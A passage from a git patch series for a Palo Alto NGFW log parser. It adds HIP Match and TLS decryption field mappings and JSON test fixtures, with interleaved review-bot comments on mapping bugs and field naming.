 source.user.domain: '{{final.source.user.name.split("\\") | first}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..f1e6cf2ad 100644
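Review bot: The swap makes `user.name`/`user.domain` correct for `user.email`, but the following `set` (its body continues past the hunk) still derives `source.user.*` from a `\\` split only, so `source.user.name` keeps the whole address — the hipmatch fixture later in this series shows `source.user.name: "jdoe@example.org"` next to `user.name: "jdoe"`, and `related.user` lists both forms. If the same normalisation is wanted on the source side, a parallel block guarded the same way would do it; if the asymmetry is deliberate, a one-line comment on the `source.user` block saying so would stop the next reader from "fixing" it.
```yaml
# … unchanged: user.email split above …
- set:
    source.user.domain: '{{final.source.user.name.split("@") | last}}'
    source.user.name: '{{final.source.user.name.split("@") | first}}'
  filter: '{{final.source.user.name != null and "@" in final.source.user.name}}'
```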
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:09:32 +0100 Subject: [PATCH 262/317] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..952e819e2 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Wed, 20 Nov 2024 18:23:49 +0100
Subject: [PATCH 263/317] fix(PaloAlto): extract host id and rule name for HIPMatch
---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++--
 .../paloalto-ngfw/tests/globalprotect_csv.json | 1 +
 .../paloalto-ngfw/tests/globalprotect_csv_2.json | 1 +
 .../paloalto-ngfw/tests/test_globalprotect.json | 1 +
 .../paloalto-ngfw/tests/test_hipmatch_json.json | 6 +++++-
 .../paloalto-ngfw/tests/test_new_globalprotect.json | 1 +
 6 files changed, 11 insertions(+), 3 deletions(-)
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index b7ec21cac..ba7fd4535 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
@@ -592,7 +592,7 @@ stages:
 event.module: "{{parsed_description.message.module}}"
 host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
 host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
 host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
 host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
 host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -617,7 +617,7 @@ stages:
 observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
 observer.serial_number: "{{parsed_event.message.DeviceSN}}"
 observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
 rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
 source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
 "name": "AAAABBBBB",
 "os": {
 "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..1d68c400c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
 "name": "2021-02707",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..8eac8428d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "662f0b44-e024-4a70",
 "name": "2023-01724",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
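Review bot: `rule.name` now falls back to `HipMatchName`, which names a HIP profile or object rather than a security rule, and the `HipMatchType` field that says which one (`profile` in the hipmatch fixture) is not extracted alongside it, so a consumer cannot tell "VPN Compliant" from a policy rule of the same name. A comment on the line such as `# HIP Match logs carry no Rule; the matched HIP profile/object name is used instead` would make the overload explicit, and copying `HipMatchType` into a `paloalto.*` field would keep the distinction. The enclosing `set` block starts before and continues after the hunk.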
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json index 952e819e2..b0b294778 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", @@ -69,4 +73,4 @@ "name": "jdoe" } } -} +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:27:19 +0100 Subject: [PATCH 264/317] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-ngfw/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ba7fd4535..ea07e1d10 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -382,6 +382,49 @@ pipeline:
 - HighResolutionTimestamp
 delimiter: ","
+ # HIPMATCH CSV
+ - name: parsed_event
+ filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+ external:
+ name: dsv.parse-dsv
+ properties:
+ input_field: original.message
+ output_field: message
+ columnnames:
+ - PaloAltoDomain
+ - ReceiveTime
+ - DeviceSN
+ - Type
+ - Subtype
+ - ConfigVersion
+ - GenerateTime
+ - SourceUser
+ - VirtualLocation
+ - MachineName
+ - EndpointOSType
+ - SourceAddress
+ - HipMatchName
+ - RepeatCount
+ - HIPMatchType
+ - FUTURE_USE
+ - FUTURE_USE
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - SourceIPv6
+ - HostID
+ - EndpointSerialNumber
+ - SourceDeviceMac
+ - HighResolutionTimestamp
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..d32952899
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json
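Review bot: `FUTURE_USE` appears twice in the HIPMATCH `columnnames`; if `dsv.parse-dsv` builds a mapping from these names, the second value silently overwrites the first — harmless for discarded columns, but surprising to anyone who later reads `parsed_event.message.FUTURE_USE`. Distinct placeholders (`FUTURE_USE_1`/`FUTURE_USE_2`, a constructed suggestion) or a comment `# two unused positional fields in the HIP Match format` would make that explicit; the other column lists earlier in this series already replaced `FUTURE_USE` with a real name where one exists. The filter keys on `parsed_dsv.message.Type == 'HIPMATCH'`, which matches the fourth column of the CSV fixture added with this commit.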
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:02:45 +0100 Subject: [PATCH 265/317] fix(PaloAlto): improve support for decryption events --- .../paloalto-ngfw/_meta/fields.yml | 17 ++- .../paloalto-ngfw/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 118 ++++++++++++++++++ 3 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ea07e1d10..c4abfd388 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
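Review bot: The `paloalto.vsys` description is changed from `The virtual system` to `the virtual system` in the same hunk that adds three `paloalto.tls.*` descriptions starting with a capital letter, so the taxonomy now mixes both styles; the lowercase edit looks unintended in a commit about decryption events. I would keep `description: The virtual system`. If a linter does demand lowercase, the three new descriptions should follow the same rule.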
@@ -651,6 +651,13 @@ stages:
 network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
 network.protocol: "{{parsed_description.message.proto}}"
 network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
 observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
 observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
 observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -795,6 +802,9 @@ stages:
 paloalto.vsys: "{{parsed_description.message.vsys}}"
 paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}"
 paloalto.server.profile: "{{parsed_description.message.server_profile}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
 - set:
 paloalto.threat.type: >
 {%- set id = parsed_threat.message.threat_code | int -%}
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json
new file mode 100644
index 000000000..bef30109a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json
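Review bot: The `tls.cipher` template in the `@@ -651` hunk reads `parsed_event.message.message.TLS_AUTH`, a doubled `.message` that nothing in the event appears to provide, and both new decryption fixtures (test_decryption_json.json and test_decryption_csv.json) end up with no `tls.cipher` even though TLSKeyExchange and TLSEncryptionAlgorithm are populated, which is consistent with the whole template failing. The same hunk reads only the DSV column names, while the JSON representation in test_decryption_json.json names the same data `TLSAuth`, `CertificateSerial` and `CommonName`, so JSON events lose the subject common name and serial number that the CSV path gets; the neighbouring lines already use the `a or b` fallback idiom for exactly this situation. I would change these three lines to `tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}"`, `tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"` and `tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"`. Note also that the resulting `TLS_ECDHE_AES_256_GCM_SHA384` is not an IANA cipher-suite name (the authentication algorithm and `WITH` are missing), so consumers matching `tls.cipher` against the registry will not find it; either document the vendor-specific form on the field or keep the components in `paloalto.tls.*` fields instead.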
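Review bot: The `@@ -795` hunk stores the server name indication only in the vendor field `paloalto.tls.sni`, although ECS already defines `tls.client.server_name` for exactly this value. Keeping the vendor copy is fine, but populating the ECS field as well lets SNI-based hunting and correlation work across intakes (the GateWatcher intake later in this series also keeps SNI only in a custom `gatewatcher.tls_sni` field, so neither source is searchable by a common key). I would add `tls.client.server_name: "{{parsed_event.message.ServerNameIndication}}"` next to the other `tls.*` mappings and assert it in the two decryption fixtures. `ChainStatus` and `RootStatus` deserve a one-line field description noting the observed value sets (`Trusted`/`Uninspected` versus `trusted`/`uninspected`), since the casing differs between the two and analysts will filter on them.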
@@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
